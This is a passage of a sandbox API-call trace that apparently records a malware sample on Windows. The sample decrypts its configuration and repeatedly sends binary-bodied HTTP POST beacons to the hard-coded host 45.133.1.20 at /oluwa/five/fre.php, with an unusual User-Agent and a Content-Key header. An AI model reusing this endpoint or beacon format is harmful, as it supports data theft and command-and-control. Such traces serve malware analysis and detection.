0x6a8658 [0254.189] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.189] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0254.190] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.190] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0254.191] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.191] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0254.192] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.192] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0254.192] GetProcessHeap () returned 0x6a0000 [0254.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0254.192] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0254.193] GetProcessHeap () returned 0x6a0000 [0254.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0254.193] socket (af=2, type=1, protocol=6) returned 0x878 [0254.193] connect (s=0x878, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0254.220] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0254.220] GetProcessHeap () returned 0x6a0000 [0254.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0254.220] GetProcessHeap () returned 0x6a0000 [0254.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0254.221] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0254.222] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0254.222] GetProcessHeap () returned 0x6a0000 [0254.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6daec8 [0254.222] GetProcessHeap () returned 0x6a0000 [0254.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0254.222] GetProcessHeap () returned 0x6a0000 [0254.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0254.223] GetProcessHeap () returned 0x6a0000 [0254.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0254.223] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0254.224] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0254.224] GetProcessHeap () returned 0x6a0000 [0254.224] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0254.224] GetProcessHeap () returned 0x6a0000 [0254.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0254.225] send (s=0x878, buf=0x6bd460*, len=242, flags=0) returned 242 [0254.225] send (s=0x878, buf=0x6bb998*, len=159, flags=0) returned 159 [0254.225] GetProcessHeap () returned 0x6a0000 [0254.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0254.225] recv (in: s=0x878, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0254.297] GetProcessHeap () returned 0x6a0000 [0254.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0254.297] GetProcessHeap () returned 0x6a0000 [0254.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0254.299] GetProcessHeap () returned 0x6a0000 [0254.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daec8 | out: hHeap=0x6a0000) returned 1 [0254.299] GetProcessHeap () returned 0x6a0000 [0254.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0254.300] closesocket (s=0x878) returned 0 [0254.300] GetProcessHeap () returned 0x6a0000 [0254.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0254.300] GetProcessHeap () returned 0x6a0000 [0254.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0254.301] GetProcessHeap () returned 0x6a0000 [0254.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0254.301] GetProcessHeap () returned 0x6a0000 [0254.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0254.315] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15a8) returned 0x878 [0254.318] Sleep (dwMilliseconds=0xea60) [0254.320] GetProcessHeap () returned 0x6a0000 [0254.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0254.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.321] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0254.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.332] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0254.343] GetProcessHeap () returned 0x6a0000 [0254.343] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0254.344] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.344] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0254.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.345] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0254.355] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.355] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0254.355] GetProcessHeap () returned 0x6a0000 [0254.356] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0254.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.357] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0254.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.358] CryptDestroyKey (hKey=0x6ad020) returned 1 [0254.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.359] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0254.359] GetProcessHeap () returned 0x6a0000 [0254.359] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0254.360] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.361] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0254.361] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.362] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0254.363] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.363] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0254.364] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.365] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0254.365] GetProcessHeap () returned 0x6a0000 [0254.365] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0254.365] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0254.366] GetProcessHeap () returned 0x6a0000 [0254.366] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0254.366] GetProcessHeap () returned 0x6a0000 [0254.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0254.367] GetProcessHeap () returned 0x6a0000 [0254.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0254.367] GetProcessHeap () returned 0x6a0000 [0254.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0254.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.369] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0254.375] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.377] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0254.385] GetProcessHeap () returned 0x6a0000 [0254.385] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0254.386] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.387] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0254.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.388] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0254.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.389] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0254.389] GetProcessHeap () returned 0x6a0000 [0254.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0254.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.391] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0254.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.392] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0254.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.393] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0254.393] GetProcessHeap () returned 0x6a0000 [0254.393] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0254.394] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.394] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0254.396] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.396] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0254.397] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.397] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0254.398] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.399] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0254.399] GetProcessHeap () returned 0x6a0000 [0254.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0254.399] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0254.399] GetProcessHeap () returned 0x6a0000 [0254.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa50 [0254.399] socket (af=2, type=1, protocol=6) returned 0x87c [0254.399] connect (s=0x87c, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0254.434] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0254.448] GetProcessHeap () returned 0x6a0000 [0254.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0254.449] GetProcessHeap () returned 0x6a0000 [0254.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0254.450] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0254.451] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0254.451] GetProcessHeap () returned 0x6a0000 [0254.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6db408 [0254.451] GetProcessHeap () returned 0x6a0000 [0254.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0254.452] GetProcessHeap () returned 0x6a0000 [0254.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0254.452] GetProcessHeap () returned 0x6a0000 [0254.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0254.453] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0254.454] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0254.454] GetProcessHeap () returned 0x6a0000 [0254.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0254.454] GetProcessHeap () returned 0x6a0000 [0254.454] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0254.454] send (s=0x87c, buf=0x6bd460*, len=242, flags=0) returned 242 [0254.455] send (s=0x87c, buf=0x6bb998*, len=159, flags=0) returned 159 [0254.456] GetProcessHeap () returned 0x6a0000 [0254.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0254.456] recv (in: s=0x87c, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0254.519] GetProcessHeap () returned 0x6a0000 [0254.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0254.520] GetProcessHeap () returned 0x6a0000 [0254.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0254.521] GetProcessHeap () returned 0x6a0000 [0254.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db408 | out: hHeap=0x6a0000) returned 1 [0254.522] GetProcessHeap () returned 0x6a0000 [0254.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0254.522] closesocket (s=0x87c) returned 0 [0254.523] GetProcessHeap () returned 0x6a0000 [0254.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa50 | out: hHeap=0x6a0000) returned 1 [0254.523] GetProcessHeap () returned 0x6a0000 [0254.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0254.523] GetProcessHeap () returned 0x6a0000 [0254.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0254.524] GetProcessHeap () returned 0x6a0000 [0254.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0254.525] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15ac) returned 0x87c [0254.527] Sleep (dwMilliseconds=0xea60) [0254.528] GetProcessHeap () returned 0x6a0000 [0254.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0254.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.533] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0254.544] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.545] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0254.557] GetProcessHeap () returned 0x6a0000 [0254.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6ba650 [0254.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.558] CryptImportKey (in: hProv=0x6beca0, pbData=0x6ba650, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0254.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.560] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0254.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.561] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0254.561] GetProcessHeap () returned 0x6a0000 [0254.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba650 | out: hHeap=0x6a0000) returned 1 [0254.563] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.570] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0254.571] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.571] CryptDestroyKey (hKey=0x6ad020) returned 1 [0254.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.572] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0254.573] GetProcessHeap () returned 0x6a0000 [0254.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0254.573] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.578] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0254.579] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.579] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0254.580] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.580] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0254.581] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.581] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0254.581] GetProcessHeap () returned 0x6a0000 [0254.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0254.582] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0254.582] GetProcessHeap () returned 0x6a0000 [0254.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0254.582] GetProcessHeap () returned 0x6a0000 [0254.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0254.583] GetProcessHeap () returned 0x6a0000 [0254.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0254.583] GetProcessHeap () returned 0x6a0000 [0254.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0254.584] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.584] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0254.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.591] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0254.601] GetProcessHeap () returned 0x6a0000 [0254.601] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0254.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.602] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0254.603] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.603] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0254.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.605] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0254.605] GetProcessHeap () returned 0x6a0000 [0254.605] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0254.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.606] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0254.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.610] CryptDestroyKey (hKey=0x6ad020) returned 1 [0254.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0254.611] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0254.611] GetProcessHeap () returned 0x6a0000 [0254.611] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0254.612] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.613] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0254.613] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.614] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0254.614] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.615] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0254.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0254.616] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0254.616] GetProcessHeap () returned 0x6a0000 [0254.616] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0254.616] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, 